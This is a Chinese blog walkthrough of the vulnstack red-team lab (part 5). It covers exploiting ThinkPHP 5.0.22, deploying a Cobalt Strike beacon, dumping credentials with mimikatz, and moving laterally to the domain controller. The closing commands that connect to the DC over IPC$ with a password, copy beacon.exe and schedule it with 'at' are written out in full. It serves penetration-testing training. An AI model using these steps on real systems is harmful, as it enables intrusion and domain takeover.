渗透靶场--vulnstack-红队评估实战(5)

vulnstack-红队评估实战(5)

环境配置

win7
sun\heart 123.com    sun\Administrator dc123.com
内网:192.168.138.136 外网:192.168.154.140
启动phpstudy

2008
sun\admin 2021.com
192.168.138.138

kali
192.168.154.129

1.对外网主机进行信息搜集

image-20210720093025353

开放了80和3306,先访问80为thinkphp,通过错误页面得到版本信息5.0.22

image-20210720093117009

搜索知道有一个代码执行漏洞,vulmap跑

image-20210720093705322

获得shell

image-20210720093940167

image-20210720093945620

2.内网信息搜集

权限为administrator

image-20210720094050372

生成exe上传执行,上线CS

image-20210720095108000

执行mimikatz得到

image-20210720095221414image-20210720095303458

由于administrator不能查询域信息,利用跑出来的面膜spawn as 出一个leo用户shell

image-20210720100230883

域管理员为Administrator ,域控机器名为DC

image-20210720100455915

image-20210720100534085

ping DC.sun.com得到域控IP

image-20210720100616279

3.横向移动

net view错误,那就通过port scan扫描到138使其加入到targets中

image-20210720102027156

又因为DC不出网,所以再win7上建立监听

image-20210720102106428

建立监听后直接通过利用之前跑出的administrator用户和psexec来控制DC

image-20210720102215677

但是这里跑不出来,后来发现是WIN7建立监听但是防火墙没有关闭,导致DC无法与端口进行传输

所以关闭防火墙

image-20210720102330024

DC上线!

image-20210720102416333

DC用户的密码

image-20210720102503875

这里横向也可以利用IPC(当密码过期时,psexec会失败)

建立IPC连接

net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator

检查

net use

上传文件(这里的exe要是完整的,监听为Win7的)

copy C:\\beacon.exe \\192.168.138.138\c$

查看时间,设置计划任务(间隔时间不要太短)

net time \\192.168.138.138
at \\192.168.138.138 yy:xx:mm c:\beacon.exe
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值